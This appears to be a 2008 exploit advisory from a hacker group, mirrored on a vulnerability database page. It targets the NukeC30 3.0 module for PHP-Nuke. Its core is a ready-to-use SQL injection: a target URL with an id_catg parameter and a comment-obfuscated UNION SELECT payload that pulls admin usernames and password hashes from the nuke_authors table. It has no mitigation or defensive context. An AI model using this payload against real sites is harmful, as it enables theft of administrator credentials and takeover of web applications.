Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19379
HistoryMar 11, 2008 - 12:00 a.m.

PHP-Nuke Module NukeC30 sql injection

2008-03-1100:00:00
vulners.com
41

----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------

= Author : HouSSaMix from H-T Team

= Script : PHP-Nuke Module NukeC30
Module's Name: NukeC30
Module's Version: 3.0

= BUG : Remote SQL Injection

= Exploit :
http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=[SQL]

[SQL]= -1//union//select//concat(aid,0x3a,pwd),2//from/**/nuke_authors/*where%20admin%20-2

= Greetz : All muslims HaCkers